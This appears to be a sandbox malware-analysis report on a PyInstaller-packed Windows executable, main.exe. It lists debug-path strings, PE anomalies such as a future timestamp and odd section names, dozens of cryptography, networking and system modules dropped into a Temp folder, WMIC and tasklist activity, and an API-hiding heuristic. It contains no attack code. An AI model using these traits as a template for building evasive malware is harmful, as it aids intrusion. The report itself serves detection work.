Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp

Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: main.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Binary contains a suspicious time stamp

Source: VCRUNTIME140_1.dll.0.dr

Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]

PE file contains sections with non-standard names

Source: libcrypto-3-x64.dll.0.dr	Static PE information: section name: .00cfg
Source: libcrypto-3.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.0.dr	Static PE information: section name: .00cfg
Source: legacy.dll.0.dr	Static PE information: section name: .00cfg
Source: mfc140u.dll.0.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: python311.dll.0.dr	Static PE information: section name: PyRuntim

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\main.exe

Process created: "C:\Users\user\Desktop\main.exe"

Drops PE files

Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\main.exe

0_2_00007FF733394C40

Source: C:\Users\user\Desktop\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pyd	Jump to dropped file
